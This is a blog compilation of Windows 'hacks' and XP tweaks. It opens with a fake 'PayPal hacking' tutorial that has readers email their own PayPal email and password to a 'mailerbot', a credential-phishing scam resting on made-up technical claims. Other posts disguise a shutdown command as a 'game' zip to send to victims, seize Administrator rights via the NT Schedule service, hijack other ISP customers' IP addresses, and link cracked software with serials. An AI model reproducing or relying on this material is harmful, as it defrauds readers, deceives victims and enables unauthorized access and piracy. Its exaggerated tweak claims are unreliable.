In the email body, you have to write 14 lines which must be exactly the same as below:
In line 1: Content-Type: text/plain;
In line 2: charset=us-ascii (To make the reply readable)
In line 3: Lang-set%%eng (To set the language to English)
In line 4: server&&bot::www.paypal.com%%hotmail%%registry (To confuse the hotmail mailerbot.)
In line 5: p35sqelmms::s%%http://www.paypal.com%% (To make the mailerbot start retrieving information acquired from PayPal.)
In line 6: Your primary email at paypal then coma then the password of this e mail account(To retrieve information from PayPal, The hotmail mailerbot now needs an Email which is the primary Email of a PayPal account with a confirmed mailing address, you have to use your own hotmail Email as a bait Email and you’ll need to receive info of other accounts from this Email too, so be sure this is your primary Email at PayPal.)
In line 7: /start*a-z%%retrieval/ (To activate the mailerbot’s retrieval function)
In line 8: verified (*value= = float) (To continue the mailerbot’s retrieval function)
In line 9: Your PayPal password (Now you have to enter your paypal password, as the Hotmail mailerbot was programmed in a way that it sends testing info to PayPal who’ll verify each account’s password and confirm it with the Hotmail mailerbot. So now you have to enter your valid/correct password of your PayPal account.)
In line 10: #searchmsgend72hr (To search for info of PayPal members who had their addresses confirmed in the last 72 hours)
In line 11: #searchend (To finish the search on the server)
In line 12: deliver&&return-path<*> (This will make the Hotmail mailerbot send all the info to your email)
In line 13: #endif (Last step) Note: Please STRICTLY follow the instruction above and you’ll be guaranteed to get an automatic reply from the confused Hotmail mailerbot! Then you’ll have email, password and all sorts of information of PayPal users who had their mailing addresses confirmed over the last 72 hours.
REMINDER: Above is the complete tutorial of hacking into PayPal accounts, and here is a reminder of the most important things mentioned above.
1) You must have a confirmed mailing address in your own PayPal account to get the whole thing to work, otherwise neither the yahoo nor hotmail mailerbot will be confused by your code and hence the hacking will fail. You can confirm your mailing address by adding a CREDIT CARD on PayPal.
2) By strictly following the instructions in this tutorial, you’ll have unlimited access to various PayPal accounts, however, YOU MUST USE THEM AT YOUR OWN RISK! YOU MUST BE RESPONSIBLE FOR YOUR ACTIONS.
3) PayPal will be expected to fix this security flaw in their server very soon, so this ONLY works BEFORE they fix this flaw. TAKE YOUR ACTION FAST, IF YOU DECIDE TO DO IT.
4) For security issues, please remember that any site that does not start with www.paypal.com is NOT a real paypal website, please confirm your mailing address ONLY at www.paypal.com so that you can succeed in hacking.

Shutdown any pc over messenger

Ok this is a........ Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim̢۪s computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things.

1) Right click on desk top, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"


You can change "this is a virus" to anything you would like that̢۪s just the message that will appear.
The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

My advice would be to rename it something like.... wicked game. Depends on the victim̢۪s age and sex. But make sure you call it something good or the victim won't bother clicking on it.
After you have given it a name click on finish.
You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it.
It is also advised you change the icon to something different.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don̢۪t forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone you...... dislike greatly.

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL
Ok go to start, run, type cmd, then in cmd type: shutdown -a

Hack administrator password

If you have lost the Administrator password, you must have the following to recover:

1. A regular user account that can logon locally to your Windows NT Workstation, Server, or PDC whichever you are recovering. If you already have an alternate install of NT, skip to The Process, Set 02.

2. The Windows NT CD-ROM and setup diskettes (winnt /ox to make them from the CD-ROM).

3. Enough room to install a temporary copy of NT (Workstation will suffice, even to recover on a PDC).

4. Your latest Service Pack.

5. The Process:

6. Install a copy of Windows NT as TEMPNT, on any drive. Install your latest Service Pack.

7. Boot the alternate install.

8. At a command prompt, type AT HH:MM /INTERACTIVE CMD /K where HH:MM is 10 minutes from now (or however much time you need to complete the remaining steps and logon to your primary installation).

9. Use Regedt32 to edit:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Schedule

10. Double click Schedule and click the one sub-key.

11. Double click the Schedule value name in the right hand pane and copy the REG_BINARY string to the clipboard.

12. Select HKEY_LOCAL_MACHINE and Load Hive from the Registry menu.

13. Navigate to your original installation\System32\Config folder and double-click System.

14. At the Key Name prompt, type ORIGSYS.

15. Navigate to ORIGSYS\Select and remember the value of Current; i.e. n.

16. Browse to ORIGSYS\ControlSet00n\Services\Schedule and if Start is not 0x2, set it to 0x2.

17. With Schedule selected, Add Key from the Edit menu.

18. Type 001 in Key Name and click OK.

19. Select 001 and Add Value name Command as type REG_SZ and set the string to CMD /K.

20. Select 001 and Add Value name Schedule as type REG_BINARY and paste the string from step 06.

21. Select ORIGSYS and Unload Hive from the Registry Menu.

22. Use Conrol Panel / System / Startup... to make your original install the default.

23. At a CMD prompt:
attrib -r -s -h c:\boot.ini edit c:\boot.ini and either change the id of the TEMPNT lines to Maint 4.0 on both entries if you intend to keep this maintenance install or delete them. attrib +r +s +h c:\boot.ini

24. Shutdown and restart your original install.

25. Logon as your user account and wait for HH:MM from step 03.

26. When the CMD prompt opens, it will be under the context of the Schedule user, either the System account or an administrative account. If this machine is the NOT the PDC, type MUSRMGR.EXE, if it is the PDC, type USRMGR.EXE. If you get an error, click YES and type your domain name.

27. Set the Administrator password and logoff.

28. Logon as Administrator.

29. If you are deleted the TEMPNT entries in step 18, delete \TEMPNT



Note: If the Schedule service runs under the context of a Domain Administrator on any member workstation, all you need to recover the PDC Administrator is a network login

Hack reliance,sify and others

First Download this ETHERNET Ip Sniffer called ETHERDETECT

Use the tool to Scan Ip's in your network

Keep Scanning till you get some 200 Ip's ..

Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !!
NOTE:Please save your Ip address somewhere so as to get back to your original ip !

It will say "Ip conflict" error,keep trying with other Ip's untill you succeed.

Sometimes when you will change your Ip you will get same speed ...in that case ..try another ip


..:~Download Link~:..
CODE
http://rapidshare.com/files/46070425/EtherDetect_setup.exe


..:~SERIAL~:..
CODE
YW38X6HKWYT4CTK

How to shut down a pc on network

Right click my computer, choose manage (computer management opens).In the left column it says Computer Management (local)
Right click it and choose: Connect to another computer
Select your computer you wish to shut down
Right click (where it used to say computer managment (local)....Then you get the computer information Goto the advanced tab and at the bottom choose Startup and Recovery and click the (mighty) shutdown button.its the super mighty Shut button by Faraz i guess(JK).LOL


or


if that aint work try looking at this Video
Quote
http://www.metacafe.com/watch/375517/how_to_remotely_shutdown_other_pcs_on_the_network/

Usage:

SHUTDOWN [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d upx:yy]


-i Display GUI interface, must be the first option

-l Log off (cannot be used with -m option)

-s Shutdown the computer

-r Shutdown and restart the computer

-a Abort a system shutdown

-m \\computername Remote computer to shutdown/restart/abort

-t xx Set timeout for shutdown to xx seconds

-c "comment" Shutdown comment (maximum of 127 characters)

-f Forces running applications to close without warning

-d [p]x:yy The reason code for the shutdown
u is the user code
p is a planned shutdown code
xx is the major reason code (positive integer less than 256)
yy is the minor reason code (positive integer less than 65536)

Saturday, August 2, 2008

Any full/cracked software

Any full/cracked software
Here is a list of my latest cracked softwares
all are full version,cracked,including serial or key genertor
*Total video converter with serial
http://rapidshare.com/files/129021318/TVP.rar

*Avast Pro V4.8.1227(Including key maker)
http://rapidshare.com/files/131975639/avast.PRO.v4.8.1227.Incl.Keygen-.rar

*Isobuster Pro V2.3(Including Key MAker)
http://rapidshare.com/files/132073626/IsoBuster_Pro_2.3_INCLUDING_KEY_GENERATOR.rar

*Real Player Gold V11.0.9.372(Patch)
http://rapidshare.com/files/132247096/Real_Player_11.0.9.372_PRO_Gold_activator.rar

*C and C++ Language
http://rapidshare.com/files/132475772/c_c___language_bothin1byASH.rar

*Oxford Dictionary
http://rapidshare.com/files/132484602/oxforddictionaryLAT.rar

*DivX Create Bundle V6.8(Inclu generator)
http://rapidshare.com/files/132486428/Divx.Create.Bundle.v6.8.3.18.Incl.KeyMakerByASH.rarr

*Universal Serials
http://rapidshare.com/files/132487247/Universal.Serials.60000plusbyASH_UPDATD_.rar

*Windows Blind Enhanced V6.10.55(Patch)
http://rapidshare.com/files/132495291/WindowBlinds_6.10.55_IMPROVEDbyASH.rar

*Peer Guardian(Full)
http://rapidshare.com/files/132720618/Peer_GuardianbyASH.rar

*Winamp Pro V5.55(Key Maker)
http://rapidshare.com/files/132732212/Winamp_5.54_PRO-byASH.rar

*Joost Beta(Full)
http://rapidshare.com/files/132958261/JoostSetup-Beta-1.1.8.rar

*Modem Booster 5(full)
http://rapidshare.com/files/132964551/Modem_Booster_5.0byASH.rar

*Satellite TV PCelite(cracked)
http://rapidshare.com/files/133204692/SatelliteTV_PC__2008_Elite_EditionbyASH.rar

*Winrar Corporate Edition(full)
http://rapidshare.com/files/133205785/WinRAR_3.7_Full_Corporate_EditionbyASH.rar

*Avg 8 Pro(Key maker)
http://rapidshare.com/files/133217048/AVG_8_PRO__KeybyASH.rar

*Smart Movie Converter(full)
http://rapidshare.com/files/133459253/Smart_Movie_Video_ConverterPRObyASH.rar

Let The Light Flash On Your KeyBoard

Let The Light Flash On Your KeyBoard

these codes when executed makes your Caps,Num,Scroll lock keys flash..
very kewlll...i hav tried it...

1.This piece of code makes ur keyboard a live disco...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


2.This one makes it looks like a chain of light....

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop



Instrcuctions:
*paste any of the two above codes in notepad
*Save as "AnyFileName".vbs
*Run the file
*to stop, launch task manager and then under "Processes" end wscript.exe

Thursday, July 31, 2008

defragment xp

Application and Boot file Defrag

This type of defrag pushes all commonly used programs and boot files to the edge of the hard drive for faster access. Windows XP normally schedules this every three days when it is idle, however you can force it to do this by useing the b switch anytime

i.e defrag c: -b

decrease your application start up time

By default, Microsoft includes the /prefetch:1 switch to speed up it's Windows Media Player application start time. This switch can be used for other Windows applications and also many third party programs.

Example #1

You have AOL 8.0 installed on the computer. Complete the steps outlined bewlo to add the /prefetch:1 switch to AOL's Target path.

1. Right click on the AOL shortcut and select properties from the menu.

2. In the Target: Field add the /prefetch:1 switch to the very end of the path, like this: "C:\Program Files\America Online 8.0\aol.exe" /prefetch:1 and then click ok.

Now start AOL. It would load at least 50 times faster than ever before.

Example #2

1, Go to the Start button/All Programs/Accessories/System Tools

2. Right click on System Restore and select properties from the menu that appears. Add the /prefetch:1 to the Target Path entry so it looks like this %ystemRoot%\System32\restore\rstrui.exe /prefetch:1 and click ok.

Now System Restore will start immediately when executed.

Note: This switch will only work with some programs. Others will return a message saying the program in the target box is invalid. Just remove the switch

win xp bootable cd

How to create a bootable Windows XP SP1 CD (Nero):

Step 1

Create 3 folders - C:\WINXPSP1, C:\SP1106 and C:\XPBOOT

Step 2

Copy the entire Windows XP CD into folder C:\WINXPSP1

Step 3

You will have to download the SP1 Update, which is 133MB.
Rename the Service Pack file to XP-SP1.EXE
Extract the Service Pack from the Run Dialog using the command:
C:\XP-SP1.EXE -U -X:C:\SP1106

Step 4

Open Start/Run... and type the command:
C:\SP1106\update\update.exe -s:C:\WINXPSP1

Click OK

Folder C:\WINXPSP1 contains: Windows XP SP1



How to Create a Windows XP SP1 CD Bootable

Step 1

Download xpboot.zip
Code:
Code:
http://thro.port5.com/xpboot.zip

( no download manager !! )

Extract xpboot.zip file (xpboot.bin) in to the folder C:\XPBOOT

Step 2

Start Nero - Burning Rom.
Select File > New... from the menu.
1.) Select CD-ROM (Boot)
2.) Select Image file from Source of boot image data
3.) Set Kind of emulation: to No Emulation
4.) Set Load segment of sectors (hex!): to 07C0
5.) Set Number of loaded sectors: to 4
6.) Press the Browse... button



Step 3

Select All Files (*.*) from File of type:
Locate boot.bin in the folder C:\XPBOOT

Step 4

Click ISO tab
Set File-/Directory length to ISO Level 1 (Max. of 11 = 8 + 3 chars)
Set Format to Mode 1
Set Character Set to ISO 9660
Check all Relax ISO Restrictions




Step 5

Click Label Tab
Select ISO9660 from the drop down box.
Enter the Volume Label as WB2PFRE_EN
Enter the System Identifier as WB2PFRE_EN
Enter the Volume Set as WB2PFRE_EN
Enter the Publisher as MICROSOFT CORPORATION
Enter the Data Preparer as MICROSOFT CORPORATION
Enter the Application as WB2PFRE_EN

* For Windows XP Professional OEM substitute WB2PFRE_EN with WXPOEM_EN
* For Windows XP Home OEM substitute WB2PFRE_EN with WXHOEM_EN

Step 6

Click Burn tab
Check Write
Check Finalize CD (No further writing possible!)
Set Write Method to Disk-At-Once

Press New button

Step 7

Locate the folder C:\WINXPSP1
Select everything in the folder and drag it to the ISO compilation panel.
Click the Write CD Dialog button.

Press Write

You're done.

win xp system response reboot without rebooting

Have you ever been using your computer and your system sudddenly stops responding in ways like it if you try to open something it just hangs? One time I tried deleting a folder and it said it was in use, but it really wasn't. If this ever happens to you, you can follow these simple steps to 'reboot' your computer without 'rebooting' it.

Press CRTL + ALT + DEL

Goto the 'processes' tab and click explorer.exe once and then click 'end process'.

Now, click File > New Task and type explorer.exe

Everything should be fine now! If the problem is major, I would recomend actually shutting down then starting up again.

Winxp Tips And Tricks, Winsock 2 repair

Repairing Damaged Winsock2

The symptoms when Winsock2 is damaged show when you try to release and renew the IP address using IPCONFIG...

And you get the following error message:

An error occurred while renewing interface 'Internet': An operation was attempted on something that is not a socket.

Also Internet Explorer may give the following error message:
The page cannot be displayed Additionally, you may have no IP address or no Automatic Private IP Addressing (APIPA) address, and you may be receiving IP packets but not sending them.

There are two easy ways to determine if Winsock2 is damaged:

From the XP source files, go to the Support / Tools directory

Winsock Test Method 1
Run netdiag /test:winsock

The end should say Winsock test ..... passed

Winsock Test Method 2

Run Msinfo32
Click on the + by Components
Click on the by Network
Click on Protocol
There should be 10 sections if the Winsock2 key is ok
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
RSVP UDP Service Provider
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...

If the names are anything different from those in this list, then likely Winsock2 is corrupted and needs to be repaired.
If you have any 3rd party software installed, the name MSAFD may be changed.
There should be no fewer than 10 sections.

To repair Winsock2

Run Regedit
Delete the following two registry keys:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2

Restart the computer
Go to Network Connections
Right click and select Properties
Click on the Install button
Select Protocol
Click on the Add button
Click on the Have Disk button
Browse to the \Windows\inf directory
Click on the Open button
Click on the OK button
Highlight Internet Protocol (TCP/IP)
Click on the OK button
Reboot

Xp Folder View Does Not Stay To You're Setting

Grab your registry editor and join in

Why Doesn't Windows Remember My Folder View Settings?

If you've changed the view settings for a folder, but Windows "forgets" the settings when you open the folder again, or if Windows doesn't seem to remember the size or position of your folder window when you reopen it, this could be caused by the default limitation on storing view settings data in the registry; by default Windows only remembers settings for a total of 200 local folders and 200 network folders.

To work around this problem, create a BagMRU Size DWORD value in both of the following registry keys, and then set the value data for both values to the number of folders that you want Windows to remember the settings for. For example, for Windows to remember the settings for 5000 local folders and 5000 network folders, set both values to 5000.

Here is how:

Follow these steps, and then quit Registry Editor:
1. Click Start, click Run, type regedit, and then click OK.
2. Locate and then click the following key in the registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell
3. On the Edit menu, point to New, and then click DWORD Value.
4. Type BagMRU Size, and then press ENTER.
5. On the Edit menu, click Modify.
6. Type 5000, and then click OK.

AND:

1. Locate and then click the following key in the registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam
2. On the Edit menu, point to New, and then click DWORD Value.
3. Type BagMRU Size, and then press ENTER.
4. On the Edit menu, click Modify.
5. Type 5000, and then click OK.

Note:

When you use roaming user profiles, registry information is copied to a server when you log off and copied to your local computer when you log on. Therefore, you may have performance issues if you increase the BagMRU Size values for roaming user profiles.

XP Repair install

1. Boot the computer using the XP CD. You may need to change the
boot order in the system BIOS. Check your system documentation
for steps to access the BIOS and change the boot order.


2. When you see the "Welcome To Setup" screen, you will see the
options below This portion of the Setup program prepares Microsoft
Windows XP to run on your computer:

To setup Windows XP now, press ENTER.

To repair a Windows XP installation using Recovery Console, press R.

To quit Setup without installing Windows XP, press F3.




3. Press Enter to start the Windows Setup.

do not choose "To repair a Windows XP installation using the
Recovery Console, press R", (you do not want to load Recovery
Console). I repeat, do not choose "To repair a Windows XP
installation using the Recovery Console, press R".

4. Accept the License Agreement and Windows will search for existing
Windows installations.

5. Select the XP installation you want to repair from the list and
press R to start the repair. If Repair is not one of the options,
read this Warning!!

6. Setup will copy the necessary files to the hard drive and reboot.
Do not press any key to boot from CD when the message appears.
Setup will continue as if it were doing a clean install, but your
applications and settings will remain intact.

Blaster worm warning: Do not immediately activate over the internet
when asked, enable the XP firewall
[ http://support.microsoft.com/?kbid=283673 ]
before connecting to the internet. You can activate after the
firewall is enabled. Control Panel - Network Connections. Right click
the connection you use, Properties, and there is a check box on the
Advanced [ http://michaelstevenstech.com/xpfirewall1.jpg ] page.


7. Reapply updates or service packs applied since initial Windows XP
installation. Please note that a Repair Install from the Original
install XP CD will remove SP1/SP2 and service packs will need to be
reapplied.
Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=049C9DBE-3B8E-
4F30-8245-9E368D3CDB5A&displaylang=en
An option I highly recommend is creating a Slipstreamed XP CD with SP2.
Slipstreaming Windows XP with Service Pack 2 (SP2)
http://www.winsupersite.com/showcase/windowsxp_sp2_slipstream.asp

______________________________________________________________________

Warning!!
If the option to Repair Install is not available and you continue
with the install;you will delete your Windows folder and Documents
and Settings folder. All applications that place keys in the registry
will need to be re-installed. You should exit setup if the repair
option is not available and consider other options.

Try the link below if the repair option is not available.
Windows XP Crashed?
http://www.digitalwebcast.com/2002/03_mar/tutorials/cw_boot_toot.htm
Here's Help.
A salvage mission into the depths of Windows XP, explained by a
non-geek

by Charlie White
http://www.digitalwebcast.com/2002/03_mar/tutorials/cw_boot_toot.htm

Related links
You May Lose Data or Program Settings After Reinstalling, Repairing,
or Upgrading Windows XP (Q312369)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q312369

System Restore "Restore Points" Are Missing or Deleted (Q301224)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q301224

How to Perform an In-Place Upgrade (Reinstallation) of Windows XP
(Q315341)
http://support.microsoft.com/search/preview.aspx?scid=kb;en-us;Q315341

Warning!! If the Repair Option is not Available
What should I do? Most important do not ignore the information below!

If the option to Repair Install is NOT available and you continue
with the install; you will delete your Windows folder, Documents and
Settings folders. All Applications that place keys in the registry
will need to be re-installed.

You should exit setup if the repair option is not available and
consider other options. I have found if the Repair option is not
available, XP is usually not repairable and will require a Clean
install.http://michaelstevenstech.com/cleanxpinstall.html
If you still have the ability to access the Windows XP installation,
backup all important files not restorable from other sources before
attempting any recovery console trouble shooting attempts.

Possible Fix by reconfiguring boot.ini using Recovery Console.
1.Boot with XP CD or 6 floppy boot disk set.
2. Press R to load the Recovery Console.
3. Type bootcfg.
4. This should fix any boot.ini errors causing setup not to see the
XP OS install.
5. Try the repair install.

One more suggestion from MVP Alex Nichol

"Reboot, this time taking the immediate R option, and if the CD
letter is say K: give these commands

COPY K:\i386\ntldr C:\
COPY K:\i386\ntdetect.com C:\


(two other files needed - just in case)

1. Type: ATTRIB -H -R -S C:\boot.ini DEL C:\boot.ini

2. Type: BootCfg /Rebuild

which will get rid of any damaged boot.ini, search the disk for
systems and make a new one. This might even result in a damaged
windows reappearing; but gives another chance of getting at the
repair"


Feedback on success or failure of the above fixes would be greatly
appreciated.



Feedback on success or failure of the above fix would be greatly
appreciated.
xpnews@michaelstevenstech.com

Your homepage never being changed

Some websites illegally modify your registry editor and set their website as default home page, for stop this,

1. Right-click on the Internet Explorer icon on your desktop and select "Properties".

2. In the "Target" box you will see "C:\Program Files\Internet

Explorer\IEXPLORE.EXE".

3. Now by adding the URL of the site to the end of this it overrides any
Homepage setting in internet options:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" www.shareordie.com

Unlock toolbar to work with them

A toolbar is a collection of buttons or icons—usually displayed across the top of the screen—that represents the different tasks you can do within a program. For example, in Microsoft Internet Explorer, there is a toolbar for the standard Internet Explorer command buttons, one for entering an Internet address, and one for quick links you can set up.

When you open a toolbar, it will appear in a particular spot on the screen. If you want to change the location of the toolbar you can move it by dragging it to the new location. You can also resize the toolbar by dragging its edge. If you find a toolbar that cannot be moved or resized, the toolbar may be locked.

To unlock a toolbar

1.


Make sure you have only one window open for the program. (You can look at the taskbar at the bottom of your screen to verify this.) Then, right-click the toolbar.

2.


If Lock the Toolbars appears on the shortcut menu and is selected (a check mark appears to the left of it), click Lock the Toolbars to unlock the toolbar. If you see Lock the Toolbars, but no check mark appears to the left of it, the toolbar is already unlocked.

Note: If Lock the Toolbars does not appear on the shortcut menu, you may not be able to move or resize the toolbar.

If you are able move the toolbar, once you’ve moved the toolbar to the location where you want it, select Lock the Toolbars so that it isn’t inadvertently moved. To make sure the change is permanent, lock the toolbar, exit the program, and then reopen it. The toolbar should be locked.

Toolbar shortcut menu with Lock the Toolbars selected

Win Xp tweaks

-----------
STARTUP
-----------


Windows Prefetcher
******************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ Memory Management \ PrefetchParameters]

Under this key there is a setting called EnablePrefetcher, the default setting of which is 3. Increasing this number to 5 gives the prefetcher system more system resources to prefetch application data for faster load times. Depending on the number of boot processes you run on your computer, you may get benefits from settings up to 9. However, I do not have any substantive research data on settings above 5 so I cannot verify the benefits of a higher setting. This setting also may effect the loading times of your most frequently launched applications. This setting will not take effect until after you reboot your system.


Master File Table Zone Reservation
**********************************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ FileSystem]

Under this key there is a setting called NtfsMftZoneReservation, the default setting of which is 1. The range of this value is from 1 to 4. The default setting reserves one-eighth of the volume for the MFT. A setting of 2 reserves one-quarter of the volume for the MFT. A setting of 3 for NtfsMftZoneReservation reserves three-eighths of the volume for the MFT and setting it to 4 reserves half of the volume for the MFT. Most users will never exceed one-quarter of the volume. I recommend a setting of 2 for most users. This allows for a "moderate number of files" commensurate with the number of small files included in most computer games and applications. Reboot after applying this tweak.


Optimize Boot Files
*******************
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Dfrg \ BootOptimizeFunction]

Under this key is a text value named Enable. A value of Y for this setting enables the boot files defragmenter. This setting defragments the boot files and may move the boot files to the beginning (fastest) part of the partition, but that last statement is unverified. Reboot after applying this tweak.

Optimizing Startup Programs [msconfig]
**************************************

MSConfig, similar to the application included in Win9x of the same name, allows the user to fine tune the applications that are launched at startup without forcing the user to delve deep into the registry. To disable some of the applications launched, load msconfig.exe from the run command line, and go to the Startup tab. From there, un-ticking the checkbox next to a startup item will stop it from launching. There are a few application that you will never want to disable (ctfmon comes to mind), but for the most part the best settings vary greatly from system to system.

As a good rule of thumb, though, it is unlikely that you will want to disable anything in the Windows directory (unless it's a third-party program that was incorrectly installed into the Windows directory), nor will you want to disable anything directly relating to your system hardware. The only exception to this is when you are dealing with software, which does not give you any added benefits (some OEM dealers load your system up with software you do not need). The nice part of msconfig is that it does not delete any of the settings, it simply disables them, and so you can go back and restart a startup application if you find that you need it. This optimization won't take effect until after a reboot.

Bootvis Application
*******************
The program was designed by Microsoft to enable Windows XP to cold boot in 30 seconds, return from hibernation in 20 seconds, and return from standby in 10 seconds. Bootvis has two extremely useful features. First, it can be used to optimize the boot process on your computer automatically. Second, it can be used to analyze the boot process for specific subsystems that are having difficulty loading. The first process specifically targets the prefetching subsystem, as well as the layout of boot files on the disk. When both of these systems are optimized, it can result in a significant reduction in the time it takes for the computer to boot.

Before attempting to use Bootvis to analyze or optimize the boot performance of your system, make sure that the task scheduler service has been enabled – the program requires the service to run properly. Also, close all open programs as well – using the software requires a reboot.

To use the software to optimize your system startup, first start with a full analysis of a fresh boot. Start Bootvis, go to the Tools menu, and select next boot. Set the Trace Repetition Settings to 2 repetitions, Start at 1, and Reboot automatically. Then set the trace into motion. The system will fully reboot twice, and then reopen bootvis and open the second trace file (should have _2 in the name). Analyze the graphs and make any changes that you think are necessary (this is a great tool for determining which startup programs you want to kill using msconfig). Once you have made your optimizations go to the Trace menu, and select the Optimize System item. This will cause the system to reboot and will then make some changes to the file structure on the hard drive (this includes a defragmentation of boot files and a shifting of their location to the fastest portion of the hard disk, as well as some other optimizations). After this is done, once again run a Trace analysis as above, except change the starting number to 3. Once the system has rebooted both times, compare the charts from the second trace to the charts for the fourth trace to show you the time improvement of the system's boot up.

The standard defragmenter included with Windows XP will not undo the boot optimizations performed by this application.



-----------------------------------
General Performance Tweaks
-----------------------------------


IRQ Priority Tweak
******************
[HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ PriorityControl]

You will need to create a new DWORD: IRQ#Priority (where # is the number of the IRQ you want to prioritize) and give it a setting of 1. This setting gives the requisite IRQ channel priority over the other IRQs on a software level. This can be extremely important for functions and hardware subsystems that need real-time access to other parts of the system. There are several different subsystems that might benefit from this tweak. Generally, I recommend giving either the System CMOS or the video card priority. The System CMOS generally has an IRQ setting of 8, and giving it priority enhances the I/O performance of the system. Giving priority to the video card can increase frame rates and make AGP more effective.

You can give several IRQs priority, but I am not entirely certain how the system interacts when several IRQs are given priority – it may cause random instabilities in the system, although it is more likely that there's a parsing system built into Windows XP to handle such an occurrence. Either way, I would not recommend it.

QoS tweak
*********
QoS (Quality of Service) is a networking subsystem which is supposed to insure that the network runs properly. The problem with the system is that it eats up 20% of the total bandwidth of any networking service on the computer (including your internet connection). If you are running XP Professional, you can disable the bandwidth quota reserved for the system using the Group Policy Editor [gpedit.msc].

You can run the group policy editor from the Run command line. To find the setting, expand "Local Computer Policy" and go to "Administrative Templates" under "Computer Configuration." Then find the "Network" branch and select "QoS Packet Scheduler." In the right hand box, double click on the "Limit Reservable Bandwidth." From within the Settings tab, enable the setting and then go into the "Bandwidth Limit %" and set it to 0%. The reason for this is that if you disable this setting, the computer defaults to 20%. This is true even when you aren't using QoS.

Free Idle Tasks Tweak
*********************

This tweak will free up processing time from any idle processes and allow it to be used by the foreground application. It is useful particularly if you are running a game or other 3D application. Create a new shortcut to "Rundll32.exe advapi32.dll,ProcessIdleTasks" and place it on your desktop. Double-click on it anytime you need all of your processing power, before opening the application.

Windows Indexing Services
Windows Indexing Services creates a searchable database that makes system searches for words and files progress much faster – however, it takes an enormous amount of hard drive space as well as a significant amount of extra CPU cycles to maintain the system. Most users will want to disable this service to release the resources for use by the system. To turn off indexing, open My Computer and right click on the drive on which you wish to disable the Indexing Service. Enter the drive's properties and under the general tab, untick the box for "Allow the Indexing Service to index this disk for fast file searching."

Priority Tweak
**************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ PriorityControl]

This setting effectively runs each instance of an application in its own process for significantly faster application performance and greater stability. This is extremely useful for users with stability problems, as it can isolate specific instances of a program so as not to bring down the entire application. And, it is particularly useful for users of Internet Explorer, for if a rogue web page crashes your browser window, it does not bring the other browser windows down with it. It has a similar effect on any software package where multiple instances might be running at once, such as Microsoft Word. The only problem is that this takes up significantly more memory, because such instances of a program cannot share information that is in active memory (many DLLs and such will have to be loaded into memory multiple times). Because of this, it is not recommended for anyone with less than 512 MB of RAM, unless they are running beta software (or have some other reason for needing the added stability).

There are two parts to this tweak. First is to optimize XP's priority control for the processes. Browse to HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ PriorityControl and set the "Win32PrioritySeparation" DWORD to 38. Next, go into My Computer and under Tools, open the Folder Options menu. Select the View tab and check the "Launch folder windows in separate process" box. This setting actually forces each window into its own memory tread and gives it a separate process priority.

Powertweak application
**********************
xxx.powertweak.com

Powertweak is an application, which acts much like a driver for our chipsets. It optimizes the communication between the chipset and the CPU, and unlocks several "hidden" features of the chipset that can increase the speed of the system. Specifically, it tweaks the internal registers of the chipset and processor that the BIOS does not for better communication performance between subsystems. Supported CPUs and chipsets can see a significant increase in I/O bandwidth, increasing the speed of the entire system. Currently the application supports most popular CPUs and chipsets, although you will need to check the website for your specific processor/chipset combo – the programmer is working on integrating even more chipsets and CPUs into the software.

Offload Network Task Processing onto the Network Card
*****************************************************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters]

Many newer network cards have the ability of taking some of the network processing load off of the processor and performing it right on the card (much like Hardware T&L on most new video cards). This can significantly lower the CPU processes needed to maintain a network connection, freeing up that processor time for other tasks. This does not work on all cards, and it can cause network connectivity problems on systems where the service is enabled but unsupported, so please check with your NIC manufacturer prior to enabling this tweak. Find the DWORD "DisableTaskOffload" and set the value to 0 (the default value is 1). If the key is not already available, create it.

Force XP to Unload DLLs
***********************
